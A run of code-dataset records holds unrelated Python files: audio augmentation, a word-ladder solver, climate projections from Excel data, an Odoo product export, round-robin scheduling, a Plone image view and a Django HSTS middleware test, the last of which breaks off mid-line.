Pool(multiprocessing.cpu_count())\n with p:\n files = p.map(load_file, path_list)\n \n p.close()\n p.join()\n return files\n\n\n# +\nstartTime = time.time()\n\ntrainFileNames = trainFileNames[:-1]\ntrainOnlyFilesNames = [f_path(x[0], \"train\") for x in trainFileNames]\ntrainLabels = [int(x[1]) for x in trainFileNames]\n\nvalidationFileNames = validationFileNames[:-1]\nvalidationOnlyFilesNames = [f_path(x[0], \"validation\") for x in validationFileNames]\nvalidationLabels = [int(x[1]) for x in validationFileNames]\n\ntestFileNames = testFileNames[:-1]\ntestOnlyFilesNames = [f_path(x[0], \"test\") for x in testFileNames]\n\n#trainFiles = load_file_list(trainOnlyFilesNames)\nvalidationFiles = load_file_list(validationOnlyFilesNames)\n#testFiles = load_file_list(testOnlyFilesNames)\n\nprint(\"Elapsed \" + str(time.time() - startTime))\n# -\n\nprint(len(validationFiles))\n\n# +\nstartTime = time.time()\ndef random_augmentation_factor():\n random1 = random.randint(7,10) / 10\n random2 = random.randint(10, 13) / 10\n random3 = random.randint(1,2)\n \n if random3 == 1:\n return random2\n else:\n return random1\ndef manipulate_speed(data, speed_factor):\n return librosa.effects.time_stretch(data, speed_factor)\ndef pitch_augment(data, sample_rate):\n bins_per_octave = 12\n pitch_pm = 2\n pitch_change = pitch_pm * 2*(np.random.uniform()) \n data = librosa.effects.pitch_shift(data.astype('float64'), \n sample_rate, n_steps=pitch_change, \n bins_per_octave=bins_per_octave)\n return data\n\ndef time_shift_augment(data):\n timeshift_fac = 0.2 *2*(np.random.uniform()-0.5) # up to 20% of length\n start = int(data.shape[0] * timeshift_fac)\n if (start > 0):\n data = np.pad(data,(start,0),mode='constant')[0:data.shape[0]]\n else:\n data = np.pad(data,(0,-start),mode='constant')[0:data.shape[0]]\n return data\n\n\naugmentedValidationFiles = []\n\ndef file_name_for_augment(path):\n return path.split('.')[0] + 'a.' + path.split('.')[1]\ndef file_name_double_for_augment(path):\n return path.split('.')[0] + 'aa.' 
+ path.split('.')[1]\n# speeding the files\nfor file in validationFiles:\n augmentedValidationFiles.append(file)\n augmentedValidationFiles.append((file_name_for_augment(file[0]), manipulate_speed(file[1], random_augmentation_factor()), file[2]))\n\nvalidationFiles = augmentedValidationFiles\naugmentedValidationFiles = []\n\n# time shifting\nfor file in validationFiles:\n augmentedValidationFiles.append((file_name_double_for_augment(file[0]), time_shift_augment(file[1]), file[2]))\n \nprint(len(validationFiles))\nfor file in augmentedValidationFiles:\n validationFiles.append(file)\nprint(len(validationFiles))\nprint(\"Elapsed \" + str(time.time() - startTime))\n# -\n\n\n\n# +\ndef create_fold_spectogram(file, saveDirectory):\n path, y, sr = file\n savePathImage = saveDirectory + '/images/' + path.split('/')[-1].replace('.wav', '.png')\n savePathNpy = saveDirectory + '/text/' + path.split('/')[-1].replace('.wav', '.npy')\n fig = plt.figure(figsize=[0.72, 0.72])\n ax = fig.add_subplot(111)\n ax.axes.get_xaxis().set_visible(False)\n ax.axes.get_xaxis().set_visible(False)\n ax.set_frame_on(False)\n feature = librosa.feature.melspectrogram(y, sr = sr)\n librosa.display.specshow(librosa.power_to_db(feature, ref=np.max))\n np.save(savePathNpy, feature)\n plt.savefig(savePathImage, dpi=400, bbox_inches='tight', pad_inches=0)\n plt.close()\n return True\n\ndef create_mfcc_spectogram(file, saveDirectory):\n path, y, sr = file\n savePathImage = saveDirectory + '/images/' + path.split('/')[-1].replace('.wav', '.png')\n savePathNpy = saveDirectory + '/text/' + path.split('/')[-1].replace('.wav', '.npy') \n fig = plt.figure(figsize=[0.72, 0.72])\n ax = fig.add_subplot(111)\n ax.axes.get_xaxis().set_visible(False)\n ax.axes.get_xaxis().set_visible(False)\n ax.set_frame_on(False)\n feature = librosa.feature.mfcc(y, sr = sr)\n librosa.display.specshow(librosa.power_to_db(feature, ref=np.max))\n np.save(savePathNpy, feature)\n plt.savefig(savePathImage, dpi=400, bbox_inches='tight', pad_inches=0)\n plt.close()\n return True\n \ndef create_crf_spectogram(file, saveDirectory):\n path, y, sr = file\n savePathImage = saveDirectory + '/images/' + path.split('/')[-1].replace('.wav', '.png')\n savePathNpy = saveDirectory + '/text/' + path.split('/')[-1].replace('.wav', '.npy') \n fig = plt.figure(figsize=[0.72, 0.72])\n ax = fig.add_subplot(111)\n ax.axes.get_xaxis().set_visible(False)\n ax.axes.get_xaxis().set_visible(False)\n ax.set_frame_on(False)\n feature = librosa.feature.chroma_stft(y, sr = sr)\n librosa.display.specshow(librosa.power_to_db(feature, ref=np.max))\n np.save(savePathNpy, feature)\n plt.savefig(savePathImage, dpi=400, bbox_inches='tight', pad_inches=0)\n plt.close()\n return True\n\n\n# +\ndef create_folders():\n def create_subfolders_for(folder_name):\n Path(folder_name).mkdir(parents=True, exist_ok=True)\n Path(folder_name + \"/images\").mkdir(parents=True, exist_ok=True)\n Path(folder_name + \"/text\").mkdir(parents=True, exist_ok=True)\n def create_folders_for(name):\n Path(name + \"/fold_spectogram\").mkdir(parents=True, exist_ok=True)\n create_subfolders_for(name + \"/fold_spectogram\")\n Path(name + \"/mfcc_spectogram\").mkdir(parents=True, exist_ok=True)\n create_subfolders_for(name + \"/mfcc_spectogram\")\n Path(name + \"/crf_spectogram\").mkdir(parents=True, exist_ok=True)\n create_subfolders_for(name + \"/crf_spectogram\")\n \n \n Path(\"kfold\").mkdir(parents=True, exist_ok=True)\n Path(\"kfold/validation\").mkdir(parents=True, exist_ok=True)\n 
create_folders_for(\"kfold/validation\")#\n\n\ndef process_and_save_train(file):\n\n #create_fold_spectogram(file, \"train/fold_spectogram\")\n #create_mfcc_spectogram(file, \"train/mfcc_spectogram\")\n #create_crf_spectogram(file, \"train/crf_spectogram\")\n \n return True\n\ndef process_and_save_validation(file):\n\n create_fold_spectogram(file, \"kfold/validation/fold_spectogram\")\n #create_mfcc_spectogram(file, \"validation/mfcc_spectogram\")\n #create_crf_spectogram(file, \"validation/crf_spectogram\")\n \n return True\n \ndef process_and_save_test(file):\n\n #create_fold_spectogram(file, \"test/fold_spectogram\")\n #create_mfcc_spectogram(file, \"test/mfcc_spectogram\")\n #create_crf_spectogram(file, \"test/crf_spectogram\")\n \n return True\n\n\n\n# -\n\ncreate_folders()\n\n# # +\n# #processing train data\n\n# startTime = time.time()\n# p = Pool(multiprocessing.cpu_count())\n# with p:\n# p.map(process_and_save_train, trainFiles)\n# p.close()\n# p.join()\n\n# print(\"Processed train data in \" + str(time.time() - startTime))\n# startTime = time.time()\n\n#processing validation data\n\nstartTime = time.time()\np = Pool(multiprocessing.cpu_count())\nwith p:\n p.map(process_and_save_validation, validationFiles)\np.close()\np.join()\n\nprint(\"Processed validation data in \" + str(time.time() - startTime))\nstartTime = time.time()\n\n#processing test data\n\n# startTime = time.time()\n# p = Pool(multiprocessing.cpu_count())\n# with p:\n# p.map(process_and_save_test, testFiles)\n# p.close()\n# p.join()\n\n# print(\"Processed test data in \" + str(time.time() - startTime))\n# startTime = time.time()\n# # -\n\n\n\n\n\n\n","sub_path":"augment shift and speed validation.py","file_name":"augment shift and speed validation.py","file_ext":"py","file_size_in_byte":10885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"158953754","text":"# Import libraries, packages, modules, classes/functions:\nfrom graph_bidirectional import Graph\nfrom data_structures import Queue, Stack\n\n\n# Fixed variables (constants):\nALPHABET = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n\n\nclass WordLadder(Graph):\n \"\"\"\n Creates a word ladder for the provided start_word and end_word, with methods that find the \n shortest path between the two.\n \"\"\"\n def __init__(self, start_word:str, end_word:str, filename):\n # Initialize from Graph class:\n super().__init__()\n\n # Convert input arguments start_word and end_word to all lowercase, to make sure all chars are lowercase:\n start_word = start_word.lower()\n end_word = end_word.lower()\n\n # Read words from file into set words_list:\n with open(filename, 'r') as file:\n self.words_list = set(file.read().split(\"\\n\")) # Set (hash table) enables faster lookup later\n\n # Add vertex for start word to our word ladder (graph):\n self.add_vertex(start_word)\n\n # Build word ladder (graph) from start_word to end_word:\n self.build_ladder(words_to_process={start_word}, end_word=end_word)\n\n # Get shortest path from start_word to end_word using bread-first search (BFS):\n self.path = self.get_path(start_word=start_word, end_word=end_word)\n \n def build_ladder(self, words_to_process:set, end_word):\n \"\"\"\n Builds a word ladder (graph) from the input set of words_to_process to the end_word, \n such that neighboring vertices in the graph are only 1 letter different from each other.\n \"\"\"\n # Base case #1: No possible 
one-letter-away words left to add:\n if len(words_to_process) < 1:\n return\n \n # List of words 1-degree away from the current words (in words_to_process):\n words_one_letter_away = set()\n\n # Get neighboring words (1 letter different) for each word in words_to_process, \n # and add those neighboring words to the word ladder (graph).\n for word in words_to_process:\n # Get list of all 1-away (one letter changed) variants of the word:\n self.get_one_letter_variants(word=word)\n\n # Base case #2: If current word is end_word, return PATH:\n if end_word in self.vertices[word]:\n return\n \n # If end_word is not among current word's neighboring words, then add those neighboring \n # words to the list to process in the next (recursive) run-through in the return below:\n for neighbor in self.vertices[word]:\n words_one_letter_away.add(neighbor)\n \n # Recurse toward above base cases by running same method with next \"level\" of words \n # (neighboring words 1 letter away from words in words_to_process):\n return self.build_ladder(words_to_process=words_one_letter_away, end_word=end_word)\n \n def get_one_letter_variants(self, word):\n \"\"\"\n Get list of all 1-away (one letter changed) variants of the word, and add them \n as vertices in our word ladder (graph), with edges connecting them to word.\n \"\"\"\n # Make sure word is in the word ladder's existing vertices:\n if word not in self.vertices:\n raise IndexError(f\"word {word} is not in this word ladder.\")\n \n # Find all valid variants of word (valid: in our words_list), and add as connected vertices \n # in our word ladder (graph):\n for letter_num in range(len(word)):\n for letter in ALPHABET:\n new_word = word[0:letter_num] + letter + word[letter_num+1:]\n if new_word in self.words_list and new_word != word:\n if new_word not in self.vertices:\n self.add_vertex(new_word)\n self.add_edge(v1=word, v2=new_word)\n \n def get_path(self, start_word, end_word):\n \"\"\"\n Run a breadth-first search (BFS) to find a shortest path from start_word to end_word.\n \"\"\"\n return self.bfs(starting_vertex=start_word, target_vertex=end_word)\n\n\n# -----------------------------------------------------------------------------------\n# Test:\nstart_word = \"funny\" # \"hungry\" \"trapeze\" \"orangutan\"\nend_word = \"lucky\"\nwl = WordLadder(start_word=start_word, end_word=end_word, filename=\"words.txt\")\nprint(wl.path)\n","sub_path":"projects/graphs/word_ladder.py","file_name":"word_ladder.py","file_ext":"py","file_size_in_byte":4482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"451647988","text":"import numpy as np\nimport xlrd\nimport xlwt\n\nDicOutput = {}\n\n# *************************** Import & Read Data **************************** #\nData1 = xlrd.open_workbook('Data.xlsx')\nnsheet = Data1.nsheets \nsheetnames = Data1.sheet_names()\n\ndef f(x,y,z):\n sheetz = Data1.sheet_by_index(z)\n Values = np.array(sheetz.cell(x,y).value)\n return Values\n \ndic = {}\nfor k in range (0,nsheet):\n sheetnamez=sheetnames[k]\n sheetz = Data1.sheet_by_index(k)\n #fz = f(k)\n R = np.array(sheetz.nrows)\n C = np.array(sheetz.ncols)\n \n M = np.empty((R,C))\n dt = np.empty((R,C))\n \n for i in range(R): \n for j in range(C): \n #print (i,j)\n h = f(i,j,k)\n #print (z)\n dt = h.dtype\n #print (dt)\n if dt!='float64':\n M[i,j]=np.array(-999999)\n else: M[i,j]=h\n np.set_printoptions(precision=3, suppress=True)\n dic[sheetnamez]=M\n#print (M)\n#print (dic) \n#%%\n# ******************************* Input 
Data ******************************** #\nInput = dic.get('InputData')\n# ************** 5 Modules *************** #\nMod1 = dic.get('NPHX') # ****NPHX**** # \nMod2 = dic.get('Jet120W') # ***Jet120W** #\nMod3 = dic.get('EUHX') # ****EUHX**** #\nMod4 = dic.get('NHT') # ****MNHT**** #\nMod5 = dic.get('ITC90W') # ***ITC90W*** #\n#print(Input.item(1,1))\n# ******************************* Constants ********************************* #\nConst = dic.get('Constants')\n\n# ****************************** Constants ********************************** #\nCT = Const[1,1]\nXCFNHT = Const[2,1]\nXCFJet120W = Const[3,1]\n\nCP = Const[6,1]\nXCEUHX = Const[7,1]\t\nXCITC = Const[8,1] #XCITC90W\nXCFcnJet = Const[9,1]\nXCFcnEUHX = Const[10,1]\nXCFcnITC = Const[11,1]\nXCFcnNPHX =\tConst[12,1]\nLatJet = Const[13,1]\nWidJet = Const[14,1]\nLatEUHX = Const[15,1]\nWidEUHX = Const[16,1]\nLatITC = Const[17,1]\nWidITC = Const[18,1]\nLatNPHX = Const[19,1]\nWidNPHX = Const[20,1]\n\nCE = Const[23,1]\nXCPrecip = Const[24,1]\nXCTmean = Const[25,1]\nXCTPrev = Const[26,1]\nECF = Const[27,1]\n\nSnowto0 = Const[30,1]\nWidthS = Const[31,1]\t\nValueS = Const[32,1]\t\nCS = Const[33,1]\t\nXCFcnTemp = Const[34,1]\t\nXCFcnPrecip = Const[35,1]\n\n# ************************** Input Variables ******************************** #\nTobs = Input[5:17 ,4]\nNHTmonth = Mod4[4, 2:] \nNHTyear = Mod4[5:, 2:]\nJet120Wmonth = Mod2[3, 2:]\nJet120Wyear = Mod2[4:, 2:]\n\nPobs = Input[5:17 ,1]\nNPHXmonth = Mod1[2, 2:]\nNPHXyear = Mod1[3:, 2:]\nEUHXmonth = Mod3[3, 2:]\nEUHXyear = Mod3[4:, 2:]\nITCmonth = Mod5[12, 2:]\nITCyear = Mod5[13:, 2:]\n\nEobs = Input[5:17 ,5]\nLCTobsm = Tobs[-1]\nRCTobsm = Tobs[0:11] #a = a[:index] + a[index+1 :] \nTPrevm = np.append(LCTobsm , RCTobsm)\n#print(TPrev)\n\nSobs = Input[5:17 ,6]\n#%%\n# ************************* Temperature Projection ************************** #\nHTemp = np.empty((len(NHTyear),len(NHTyear.T)))\n\nfor p in range (len(NHTyear.T)): #12\n for q in range (len(NHTyear)): #400\n \n TRawCalcNow = (XCFNHT * NHTmonth[p])+(XCFJet120W * Jet120Wmonth[p]) + CT\n \n HTemp[q,p] = CT + Tobs[p] - TRawCalcNow + (XCFNHT*NHTyear[q,p]) + (XCFJet120W*Jet120Wyear[q,p])\n np.set_printoptions(precision=2, suppress=True)\n#print(HTemp)\n#%%\n# ************************ Precipitation Projection ************************* #\nPPTCRm = np.power(Pobs,0.33333)\n \nHPrecip = np.empty((len(NHTyear),len(NHTyear.T)))\n\nfor p in range (len(NHTyear.T)): #12\n for q in range (len(NHTyear)): #400\n \n FcnJetm = np.exp(-0.5*np.power(((LatJet-Jet120Wmonth[p])/WidJet),2))\n FcnEUHXm = np.exp(-0.5*np.power(((LatEUHX-EUHXmonth[p])/WidEUHX),2)) #FcnHigh\n FcnITCm = np.exp(-0.5*np.power(((LatITC-ITCmonth[p])/WidITC),2))\n FcnNPHXm = np.exp(-0.5*np.power(((LatNPHX-NPHXmonth[p])/WidNPHX),2)) #Other\n PRawm = np.power((CP + XCEUHX * EUHXmonth[p] + XCITC * ITCmonth[p] + XCFcnJet * FcnJetm + XCFcnEUHX * FcnEUHXm + XCFcnITC * FcnITCm + XCFcnNPHX * FcnNPHXm),3)\n #print(PRawm)\n FcnJety = np.exp(-0.5*np.power(((LatJet-Jet120Wyear[q,p])/WidJet),2))\n FcnEUHXy = np.exp(-0.5*np.power(((LatEUHX-EUHXyear[q,p])/WidEUHX),2)) #FcnHigh\n FcnITCy = np.exp(-0.5*np.power(((LatITC-ITCyear[q,p])/WidITC),2))\n FcnNPHXy = np.exp(-0.5*np.power(((LatNPHX-NPHXyear[q,p])/WidNPHX),2)) #Other\n \n HPrecip[q,p]=(np.power((CP + (XCEUHX * EUHXyear[q,p]) + (XCITC * ITCyear[q,p]) + (XCFcnJet * FcnJety) + (XCFcnEUHX * FcnEUHXy) + (XCFcnITC * FcnITCy) + (XCFcnNPHX * FcnNPHXy)),3)) * (Pobs[p] / PRawm)\n np.set_printoptions(precision=2, suppress=True)\n#print(HPrecip)\n#%%\n# 
************************* Evaporation Projection ************************** #\nLCHTempy = HTemp[:,11]\nRCHTempy = HTemp[:,0:11]\nTPrevy = np.c_[LCHTempy,RCHTempy]\n#print (TPrevy)\n\nHEvap = np.empty((len(HPrecip),len(HPrecip.T)))\n\nfor p in range (len(HPrecip.T)): #12\n for q in range (len(HPrecip)): #400\n \n ERawm = np.power((CE + XCPrecip * Pobs[p] + XCTmean * Tobs[p] + XCTPrev * TPrevm[p]),3)\n \n HEvap[q,p]=ECF * (np.power((CE + (XCPrecip * HPrecip[q,p]) + (XCTmean * HTemp[q,p]) + (XCTPrev * TPrevy[q,p])),3)) * (Eobs[p] / ERawm)\n np.set_printoptions(precision=2, suppress=True)\n#print (HEvap)\n#%%\n# **************************** Snow Projection ****************************** #\nFcnPrecipm = np.exp(-0.5*np.power([(ValueS - X)/WidthS for X in Pobs],2))\nFcnPrecipy = np.exp(-0.5*np.power([(ValueS - Y)/WidthS for Y in HPrecip],2))\nRatioStoP = Sobs/Pobs\n\nFcnTempm = np.empty((np.shape(Tobs)))\nFcnTempy = np.empty((np.shape(HTemp)))\nHSnow = np.empty((np.shape(HPrecip)))\n\nfor p in range (len(HPrecip.T)): #12\n for q in range (len(HPrecip)): #400\n \n if Tobs[p] < Snowto0:\n FcnTempm[p] = -1 * (Tobs[p]-Snowto0)\n else: FcnTempm[p] = 0\n \n SrawCalNow = CS + (XCFcnTemp * FcnTempm) + (XCFcnPrecip * FcnPrecipm)\n \n if HTemp[q,p] < Snowto0:\n FcnTempy[q,p] = -1 * (HTemp[q,p]-Snowto0)\n HSnow[q,p] = (CS + (XCFcnTemp * FcnTempy[q,p]) + (XCFcnPrecip * FcnPrecipy[q,p])) * (Sobs[p]/SrawCalNow[p])\n else: \n HSnow [q,p] = 0 \n FcnTempy[q,p] = 0\n#print (HSnow)\n#%%\n# ********************** Export Output in Excelsheet *************************#\nOutput = xlwt.Workbook()\nSnowSheet = Output.add_sheet(\"HSnow\")\nTempSheet = Output.add_sheet(\"HTemp\")\nMonth = np.array([\"January\", \"February\", \"March\", \"April\", \"May\", \"June\", \"July\", \"August\", \"September\", \"October\", \"November\", \"December\"])\nSnowMonth = SnowSheet.write(0,0, \"100PY/Month\")\nNumFormat = xlwt.easyxf(num_format_str='0.00')\nfor p in range (len(HSnow.T)): \n for q in range (len(HSnow)):\n SnowXL = SnowSheet.write(q+1, p+1, HSnow[q,p], NumFormat) \nfor p in range (len(HSnow.T)): \n SnowRowMonth = SnowSheet.write(0, p+1, Month[p])\nfor q in range (len(HSnow)):\n PYear = -100*q\n SnowColPYear = SnowSheet.write(q+1, 0, PYear)\n\nOutput.save(\"Output.xls\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Temp-Precip-Evap-Snow-Projection.py","file_name":"Temp-Precip-Evap-Snow-Projection.py","file_ext":"py","file_size_in_byte":7070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"485689307","text":"#!/usr/bin/env python3\n\nfrom collections import deque\nfrom itertools import islice\n\n# Round robin scheduling\n# https://stackoverflow.com/questions/32358841/grouping-list-combinations-for-round-robin-tournament\n# itertools.combinations returns the right set of matchups, but in a unusable order\ndef fixtures(teams):\n # Fix odd numbered teams\n if len(teams) % 2:\n teams.append(\"Bye\")\n\n ln = len(teams) // 2\n dq1, dq2 = deque(islice(teams, None, ln)), deque(islice(teams, ln, None))\n for _ in range(len(teams)-1):\n yield zip(dq1, dq2) # list(zip.. 
python3\n # pop off first deque's left element to\n # \"fix one of the competitors in the first column\"\n start = dq1.popleft()\n # rotate the others clockwise one position\n # by swapping elements\n dq1.appendleft(dq2.popleft())\n dq2.append(dq1.pop())\n # reattach first competitor\n dq1.appendleft(start)\n\n# Break up the groupings as we aren't doing a tournament\ndef faceoffs(teams):\n output = []\n for group in fixtures(teams):\n for faceoff in group:\n output.append(faceoff)\n return(output)\n\n# Repeating cycle of faceoffs when # games > faceoffs\ndef faceoffs_repeated(teams, games=None):\n cycle=faceoffs(teams)\n if games:\n cycles = cycle * (games // len(cycle) + 1)\n return(cycles[:games])\n else:\n return(cycle)\n\nif __name__ == \"__main__\":\n print('Demo of faceoffs function')\n teams = list(range(1,7))\n teams = ['Team 1', 'Team 2', 'Team 3', 'Team 4', 'Team 5', 'Team 6']\n print(f\"Teams: {teams}\")\n print(f\"Faceoffs: {faceoffs(teams)}\")\n","sub_path":"faceoffs.py","file_name":"faceoffs.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"447013411","text":"n, m = map(int, input().split())\nabc = []\ndis = [[float('inf')]*n for _ in range(n)]\nfor _ in range(m):\n abc.append(list(map(int, input().split())))\n\nfor a, b, c in abc:\n dis[a-1][b-1] = c\n dis[b-1][a-1] = c\n\nfor k in range(n):\n for i in range(n):\n for j in range(n):\n dis[i][j] = min(dis[i][j], dis[i][k]+dis[k][j])\n\ncount = 0\nfor a, b, c in abc:\n if c > dis[a-1][b-1]:\n count += 1\n\nprint(count)","sub_path":"work/atcoder/abc/abc051/D/answers/057816_daik_diak.py","file_name":"057816_daik_diak.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"435564702","text":"from enum_month import enum_month as em\n\nimport json\nimport csv\nimport os\nimport wget\n\nindex = 1\n\nwith open(\"mega_inzuppone_1_col.csv\", mode=\"w\") as ext_file:\n ext_file_writer = csv.writer(ext_file)\n ext_file_writer.writerow([\"ID\", \"Numero\"])\n for anni_range in range(2015, 2020):\n for mese_range in range(1, 13):\n calc_mese = em(str(mese_range))\n mese_numero = calc_mese[0]\n with open(\"estrazioni/\" + str(anni_range) + \"/\" + str(mese_numero) + \".csv\") as f:\n extracted = csv.reader(f)\n next(extracted, None)\n for rows in extracted:\n ext_file_writer.writerow([str(index), rows[0]])\n index += 1","sub_path":"inzuppone_col_creator.py","file_name":"inzuppone_col_creator.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"188928781","text":"\n\n#calss header\nclass _TRUANT():\n\tdef __init__(self,): \n\t\tself.name = \"TRUANT\"\n\t\tself.definitions = [u'Children who truant are regularly absent from school, usually while pretending to their parents that they have gone to school: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_truant.py","file_name":"_truant.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"226900742","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 
23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: /home/hvelarde/forcontent/idg/src/brasil.gov.portal/src/brasil/gov/portal/browser/helper.py\n# Compiled at: 2018-11-30 15:01:51\n__doc__ = 'Helper view to return a background image or video to be used in the\\nsite root when the expandable header is enabled.\\n'\nfrom __future__ import absolute_import\nfrom brasil.gov.portal.controlpanel.portal import ISettingsPortal\nfrom plone import api\nfrom plone.formwidget.namedfile.converter import b64decode_file\nfrom plone.namedfile.browser import Download\nfrom plone.namedfile.file import NamedFile\nimport hashlib\n\nclass BackgroundMediaView(Download):\n \"\"\"Helper view to return a background image or video to be used in\n the site root when the expandable header is enabled.\n \"\"\"\n\n def setup(self):\n name = ISettingsPortal.__identifier__ + '.background_image'\n background_image = api.portal.get_registry_record(name, default=None)\n if background_image is None:\n self.data = None\n return\n else:\n filename, data = b64decode_file(background_image)\n self.filename = filename\n self.data = NamedFile(data=data, filename=filename)\n self.checksum = hashlib.sha1(data).hexdigest()\n return\n\n def _getFile(self):\n return self.data\n\n def __call__(self):\n \"\"\"Render the background image or video.\n\n Make use of HTTP caching headers to decrease server usage:\n file is not cached on browsers and is cached 120 seconds on\n intermediate caches. We use a checksum of the image data as\n ETag to return a 304 (Not Modified) status in case the file\n has not changed since last time it was accessed.\n\n More information: https://httpwg.org/specs/rfc7234.html\n \"\"\"\n self.setup()\n if self.data is None:\n self.request.RESPONSE.setStatus(410)\n return ''\n else:\n self.request.RESPONSE.setHeader('Cache-Control', 'max-age=0, s-maxage=120')\n self.request.RESPONSE.setHeader('ETag', self.checksum)\n match = self.request.get_header('If-None-Match', '')\n if self.checksum == match:\n self.request.response.setStatus(304)\n return ''\n return super(BackgroundMediaView, self).__call__()","sub_path":"pycfiles/brasil.gov.portlets-1.0.tar/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":2485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"36642272","text":"# -*- coding: utf-8 -*-\n# Part of Odoo. 
See LICENSE file for full copyright and licensing details.\n\nimport csv\nimport logging\n\nfrom datetime import datetime as dt\nfrom io import StringIO\n\nfrom odoo import models, _\n\n_logger = logging.getLogger(__name__)\n\nCSV_HEADER = 'backmarket_id sku state price quantity lang warranty_delay'.split(' ')\n\n\nclass ProductIntegration(models.Model):\n\n    _inherit = 'edi.integration'\n\n    def _get_out_synchronizations(self):\n        \"\"\"\n        \"\"\"\n\n        integration = self.env.ref('edi_backmarket.backmarket_products_integration')\n        if self == integration:\n\n            # NOTE: Keep pricelist in context\n            Product = self.env['product.product'].with_context(\n                pricelist=self.env.ref('edi_backmarket.backmarket_pricelist').id\n            )\n\n            now = dt.utcnow().strftime('%s')\n\n            products = Product.search([\n                ('backmarket_sync', '=', True)\n            ])\n            if not products:\n                _logger.info(_('No products configured to be synchronized with %s' % integration.name))\n                return self.env['edi.synchronization']\n\n            locations = self.env['stock.location'].search([\n                ('backmarket_sync', '=', True)\n            ])\n            if not locations:\n                _logger.info(_('No locations found to synchronize with %s' % integration.name))\n                return self.env['edi.synchronization']\n\n            output = StringIO()\n            writer = csv.writer(output, delimiter=';')\n\n            writer.writerow(CSV_HEADER)\n\n            products_to_sync = Product\n            product_qties = {}\n            for p in products:\n\n                stock_quant = self.env['stock.quant'].search([\n                    ('location_id', 'in', locations.ids),\n                    ('product_id', '=', p.id)\n                ])\n                qty = sum(stock_quant.mapped('quantity')) - sum(stock_quant.mapped('reserved_quantity'))\n\n                if qty < 0:\n                    _logger.info(_('Product \\'%s: %s\\' skipped, unavailable') % (p.display_name, p.id))\n                    continue\n\n                products_to_sync |= p\n                product_qties[p.id] = qty\n\n            if not products_to_sync:\n                _logger.info(_('No products found to synchronize with %s' % integration.name))\n                return self.env['edi.synchronization']\n\n            for p in products_to_sync:\n                row = [p.backmarket_id, p.default_code, p.backmarket_grade, '%.0f' % p.price, int(product_qties[p.id]), 'fr-fr', 6]\n                writer.writerow(row)\n\n            content = output.getvalue()\n\n            self.env['edi.synchronization'].create({\n                'name': 'backmarket_%s.csv' % now,\n                'filename': 'Import_products_%s.csv' % now,\n                'integration_id': self.id,\n                'content': content\n            })\n\n        return super(ProductIntegration, self)._get_out_synchronizations()\n","sub_path":"edi_backmarket/models/edi_integration.py","file_name":"edi_integration.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"514373494","text":"# coding=utf-8\n\n# The root directory of the dataset file\ndataset_dir = '/Users/tomwang/Downloads/deep_learning/VOC/train/VOCdevkit/VOC2012'\n\n# The cache file to cache the middle data of the data-set\ncache_dir = '/Users/tomwang/Downloads/deep_learning/VOC/train/'\n\n# mini_batch size\nbatch_size = 32\n\n# image_size\nimage_size = 448\n\n# The number of grid cell\ncell_num = 7\n\n# class\nclz = ['aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus', 'car', 'cat', 'chair', 'cow', 'diningtable',\n       'dog', 'horse', 'motorbike', 'person', 'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor']\n\n\n","sub_path":"voc/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"460412","text":"\"\"\"\nThis file serves as a template to be imported by other modules\n\"\"\"\n\n\n# Return the first n Fibonacci numbers\ndef fib(n):\n    a = 0\n    b = 1\n    result = []\n    for i
in range(n):\n        result.append(b)\n        num = a + b\n        a = b\n        b = num\n    print(result)\n    return result\n\n\n\"\"\"\nThis way the test runs only when this module is executed directly,\nnot every time another module imports it\n\"\"\"\n# Test the module\nif __name__ == \"__main__\":\n    fib(6)\n","sub_path":"venv/Include/module_import.py","file_name":"module_import.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"231072118","text":"from django.conf import settings\nfrom django.http import HttpResponse\nfrom django.test.client import RequestFactory\n\nimport mock\nfrom nose.tools import eq_\n\nfrom commonware.response import middleware\n\n\ndef _make_resp(mw_cls, secure=False):\n    mw = mw_cls()\n    req = RequestFactory().get('/')\n    if secure:\n        req.is_secure = lambda: True\n    resp = mw.process_response(req, HttpResponse())\n    return resp\n\n\ndef test_sts_middleware():\n    resp = _make_resp(middleware.StrictTransportMiddleware)\n    assert 'strict-transport-security' not in resp\n    resp = _make_resp(middleware.StrictTransportMiddleware, secure=True)\n    assert 'strict-transport-security' in resp\n    eq_('max-age=2592000', 